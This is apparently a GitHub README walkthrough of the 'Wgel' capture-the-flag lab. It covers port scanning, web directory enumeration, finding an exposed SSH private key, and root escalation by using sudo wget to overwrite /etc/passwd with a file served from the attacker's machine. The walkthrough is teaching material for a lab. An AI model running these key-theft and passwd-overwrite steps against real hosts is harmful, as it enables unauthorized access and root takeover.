Skip to content

gkhns/Wgel-CTF

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits

README.md

README.md

 
 

Repository files navigation

#Linux #Wget

NMAP Scan

  nmap -sV -sC -p- 10.10.207.235
  • To see the versions of the services running (-sV)
  • To perform a script scan using the default set of scripts (-sC)
  • To scan all ports from 1 through 65535 (-p-)

OPEN PORTS

  • 22/tcp ssh
  • 80/tcp http

image

Interesting info: A person named Jessie is mentioned in the website source code:

image

Let's try Nikto for vulnerability scanning.

Nikto is an open source web server and web application scanner. Nikto can perform comprehensive tests against web servers for multiple security threats, including over 6700 potentially dangerous files/programs. Nikto can also perform checks for outdated web servers software, and version-specific problems. Here are some of the commonly used commands:

image

Nikto results reveal that the Apache server is outdated -v 2.4.18

image

A searchsploit analysis confirms an existing vulnerability on the Apache server.

image

Details of the CARPE (DIEM): CVE-2019-0211 Apache Root Privilege Escalation are summarized in the following link:

https://cfreal.github.io/carpe-diem-cve-2019-0211-apache-local-root.html

Gobuster search suggests a hidden directory /sitemap (Status 301)

image

A further Gobuster search on http://10.10.207.235/sitemap suggests a hidden /.ssh directory hosting a private key!

image

What we need to do now are:

  1. Change file permissions for the id_rsa as chmod 600 jessie_id_rsa
  2. Login ssh using the private key: ssh -i path/to/key_file username@remote_host

We can assume that the private keys belongs to Jessie -- This name was mentioned in a comment line in website source code (see above)

image

We now have the user flag captured, let's explore the vulnerabilities for privilege escalation, let's try sudo -l to see the allowed commands

image

It seems that we can use GTFOBins Wget vulnerability as explained here: https://gtfobins.github.io/gtfobins/wget/

image

Here are steps that can be followed:

  1. Copy etc/passwd in the local host, generate a password for the root account, and include it as password hash in passwd:

image

image

  1. Open an HTTP server on the local host: sudo python3 -m http.server 80

  2. Transfer the passwd to target machine: sudo wget http://10.18.123.93/passwd -O /etc/passwd

image

  1. Elevate to root: su root -- Password above

About

Wgel-CTF

Topics

linux wget

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published